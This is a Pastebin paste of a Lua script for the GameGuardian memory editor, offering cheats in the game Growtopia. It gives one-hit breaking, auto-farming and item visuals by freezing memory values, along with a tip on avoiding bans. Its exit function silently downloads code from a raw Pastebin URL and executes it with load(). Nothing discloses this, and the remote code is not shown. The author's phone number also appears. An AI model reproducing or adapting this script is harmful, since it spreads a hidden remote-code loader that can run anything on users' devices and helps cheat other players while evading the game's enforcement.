ShcFarus

Growtopia

Oct 11th, 2019
2,827
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 6.98 KB | None | 0 0
  1. --By Only SSTool
  2. print("________________")
  3. print("LOG SCRIPT")
  4. print("Growtopia")
  5. print("________________")
  6.  
  7.  
  8. function menu()
  9.   a = gg.choice({
  10.     "🥊 1 Hit",
  11.     "🚜 Tractor Mode",
  12.     "🚜 Auto Plant Mode",
  13.     "🥊 Rayman Mode (Require Flashlight) ",
  14.     "❌ Disable All Hack",
  15.     "🕵️‍♀️ About Me",
  16.     "❎ Exit "
  17.   }, nil, "🚜 Growtopia Farmer Pack 🚜\n✭ Newbie Squad Ark ✭")
  18.   if a == nil then
  19.   else
  20.     if a == 1 then
  21.       hit()
  22.     end
  23.     if a == 2 then
  24.       tractor()
  25.     end
  26.     if a == 3 then
  27.       seed()
  28.     end
  29.     if a == 4 then
  30.       rayman()
  31.     end
  32.     if a == 5 then
  33.       disable()
  34.     end
  35.     if a == 6 then
  36.       about()
  37.     end
  38.     if a == 7 then
  39.       HJ()
  40.     end
  41.   end
  42.   var = -1
  43. end
  44. function about()
  45.   gg.alert("➣ Whatsapp  : 0858 4867 7467\n➣ Instagram : @newbiesquadark\n➣ Youtube    : Newbie Squad Ark\n\nDon't Forget For \n➣ Subscribe My Youtube Channel\n➣ Follow Me In Instagram")
  46.   menu()
  47. end
  48. function HJ()
  49.   t = gg.alert("Are You Sure To Exit?", "Yes", "No")
  50.   if t == 1 then
  51.     JH()
  52.   end
  53.   if t == 2 then
  54.     menu()
  55.   end
  56. end
  57. function disable()
  58.   a = gg.getListItems()
  59.   do
  60.     do
  61.       for _FORV_3_, _FORV_4_ in ipairs(a) do
  62.         a[_FORV_3_].value = "0"
  63.       end
  64.     end
  65.   end
  66.   gg.setValues(a)
  67.   gg.removeListItems(a)
  68.   gg.clearResults()
  69.   gg.toast(" All Item Disabled! ")
  70. end
  71. function JH()
  72.   a = gg.getListItems()
  73.   do
  74.     do
  75.       for _FORV_3_, _FORV_4_ in ipairs(a) do
  76.         a[_FORV_3_].value = "0"
  77.       end
  78.     end
  79.   end
  80.   gg.setValues(a)
  81.   gg.removeListItems(a)
  82.   gg.clearResults()
  83.   local url = "https://pastebin.com/raw/PRMsruhS"
  84. local cheakin = gg.makeRequest(url).content
  85. if cheakin == nil then os.exit() end
  86. local e = load(cheakin)() end
  87. function rayman()
  88.   abc = gg.alert("Did you already wear your flaslight? ", " YES ", " NOT YET ")
  89.   if abc == 1 then
  90.     stat = "214"
  91.     stats = "rayman"
  92.     proc()
  93.   end
  94.   if abc == 2 then
  95.     repeat
  96.       gg.sleep(1)
  97.     until gg.isVisible(true)
  98.     gg.setVisible(false)
  99.   end
  100. end
  101. function tractor()
  102.   a = gg.choice({
  103.     "• Require Air Robinson ",
  104.     "• Require Stinky Socks ",
  105.     "• Back "
  106.   }, nil, " Tractor Mode")
  107.   if a == 1 then
  108.     stat = "496"
  109.     stats = "tractor"
  110.     proc()
  111.   end
  112.   if a == 2 then
  113.     stat = "372"
  114.     stats = "tractor"
  115.     proc()
  116.   end
  117.   if a == 3 then
  118.     menu()
  119.   end
  120.   var = -1
  121. end
  122. function seed()
  123.   gg.clearResults()
  124.   a = gg.choice({
  125.     "• Require Air Robinson ",
  126.     "• Require Stinky Socks ",
  127.     "• Back "
  128.   }, nil, " Auto Plant Seed ")
  129.   if a == 1 then
  130.     stat = "496"
  131.     stats = "seed"
  132.     proc()
  133.   end
  134.   if a == 2 then
  135.     stat = "372"
  136.     stats = "seed"
  137.     proc()
  138.   end
  139.   if a == 3 then
  140.     menu()
  141.   end
  142.   var = -1
  143. end
  144. function hit()
  145.   a = gg.choice({
  146.     "• 1 Hit Require Flashlight ",
  147.     "• 1 Hit Require Pickaxe ",
  148.     "• 1 Hit Require Flamethrower ",
  149.     "• Back"
  150.   })
  151.   if a == nil then
  152.   else
  153.     if a == 1 then
  154.       stat = "214"
  155.       stats = "214"
  156.       nama = "Flashlight"
  157.       vis()
  158.     end
  159.     if a == 2 then
  160.       stat = "98"
  161.       stats = "98"
  162.       nama = "Pickaxe"
  163.       vis()
  164.     end
  165.     if a == 3 then
  166.       stat = "1748"
  167.       stats = "1748"
  168.       nama = "Flamethrower"
  169.       vis()
  170.     end
  171.     if a == 4 then
  172.       menu()
  173.     end
  174.   end
  175.   var = -1
  176. end
  177. function vis()
  178.   gg.searchNumber(stat .. ";125F", gg.TYPE_WORD)
  179.   grc = gg.getResultsCount()
  180.   if grc == nil then
  181.     gg.alert(" You should wear " .. nama .. " first! ")
  182.   end
  183.   b = gg.getResultsCount()
  184.   c = gg.getResults(1)
  185.   gg.removeResults(c)
  186.   get = gg.getResults(b)
  187.   gg.addListItems(get)
  188.   lol()
  189. end
  190. function lol()
  191.   t = gg.choice({
  192.     "• " .. nama .. " to Visual menu ",
  193.     "• " .. nama .. " to Custom Visual ",
  194.     "• Back"
  195.   })
  196.   if t == 1 then
  197.     lolz()
  198.   elseif t == 2 then
  199.     custom()
  200.   elseif t == 3 then
  201.     hit()
  202.   end
  203.   var = -1
  204. end
  205. function custom()
  206.   a = gg.prompt({
  207.     " Input your Visual Item ID : "
  208.   }, nil, {"number"})
  209.   if a ~= nil then
  210.     stat = a[1]
  211.     proc()
  212.   else
  213.     lol()
  214.   end
  215. end
  216. function lolz()
  217.   a = gg.choice({
  218.     "• " .. nama .. " to Legendary Katana ",
  219.     "• " .. nama .. " to Zeus Lightning Bold ",
  220.     "• " .. nama .. " to Ring Of Force ",
  221.     "• " .. nama .. " to Jade Crescent Axe ",
  222.     "• " .. nama .. " to The Gungnir "
  223.   }, nil, " Select 1 Hit Visual :")
  224.   if a == 1 then
  225.     stat = "2592"
  226.     proc()
  227.   end
  228.   if a == 2 then
  229.     stat = "1804"
  230.     prec()
  231.   end
  232.   if a == 3 then
  233.     stat = "1874"
  234.     prec()
  235.   end
  236.   if a == 4 then
  237.     stat = "7044"
  238.     prec()
  239.   end
  240.   if a == 5 then
  241.     stat = "2756"
  242.     prec()
  243.   end
  244.   var = -1
  245. end
  246. function prec()
  247.   gg.clearResults()
  248.   a = gg.getListItems()
  249.   do
  250.     do
  251.       for _FORV_3_, _FORV_4_ in ipairs(a) do
  252.         a[_FORV_3_].value = "5480"
  253.         a[_FORV_3_].freeze = true
  254.         a[_FORV_3_].freezType = gg.FREEZE_NORMAL
  255.       end
  256.     end
  257.   end
  258.   gg.setValues(a)
  259.   gg.addListItems(a)
  260.   gg.alert([[
  261. Now you need to repeat equip and unequip the ".. nama .." until the pet rayman appear
  262. Then hold (charge) the rayman until the punch effect coloured yellow and then flick your finger to jump button
  263. If Done click GG Icon]])
  264.   repeat
  265.     gg.sleep(1)
  266.   until gg.isVisible(true)
  267.   gg.setVisible(false)
  268.   ale = gg.alert("Has your rayman charged now? ", " Yes ", " Not yet ")
  269.   if ale == 1 then
  270.     proc3()
  271.   end
  272.   if ale == 2 then
  273.     prec()
  274.   end
  275. end
  276. function proc()
  277.   gg.searchNumber("125F;" .. stat, gg.TYPE_WORD)
  278.   b = gg.getResultsCount()
  279.   c = gg.getResults(1)
  280.   gg.removeResults(c)
  281.   a = gg.getResults(b)
  282.   if stats == "seed" then
  283.     gg.editAll("5022", gg.TYPE_WORD)
  284.     gg.clearResults()
  285.   elseif stats == "rayman" then
  286.     do
  287.       do
  288.         for _FORV_3_, _FORV_4_ in ipairs(a) do
  289.           a[_FORV_3_].value = "5480"
  290.           a[_FORV_3_].freeze = true
  291.         end
  292.       end
  293.     end
  294.     gg.addListItems(a)
  295.     gg.clearResults()
  296.   elseif stats == "tractor" then
  297.     gg.editAll("1966", gg.TYPE_WORD)
  298.     gg.clearResults()
  299.     gg.addListItems(a)
  300.     char()
  301.   end
  302. end
  303. function proc3()
  304.   a = gg.getListItems()
  305.   do
  306.     do
  307.       for _FORV_3_, _FORV_4_ in ipairs(a) do
  308.         a[_FORV_3_].value = stats
  309.         a[_FORV_3_].freeze = true
  310.       end
  311.     end
  312.   end
  313.   gg.setValues(a)
  314.   do
  315.     do
  316.       for _FORV_3_, _FORV_4_ in ipairs(a) do
  317.         a[_FORV_3_].value = stat
  318.         a[_FORV_3_].freeze = true
  319.       end
  320.     end
  321.   end
  322.   gg.setValues(a)
  323.   a[1].value = "3274"
  324.   a[2].value = stat
  325.   a[3].value = stat
  326.   a[1].freeze = true
  327.   a[2].freeze = true
  328.   a[3].freeze = true
  329.   gg.setValues(a)
  330.   gg.addListItems(a)
  331.   gg.alert("1 HIT ✔ Active ✔\n\t\n*Note : 🥊 Punch 1 by 1 block if no need get ❌ banned ❌\n\t")
  332. end
  333. while true do
  334.   if gg.isVisible(true) then
  335.     var = 1
  336.     gg.setVisible(false)
  337.   end
  338.   if var == 1 then
  339.     menu()
  340.   end
  341. end
  342.  
  343.  
  344. --We are the tender love in the world.
  345.  
  346. --By Only SSTool
Advertisement
Add Comment
Please, Sign In to add comment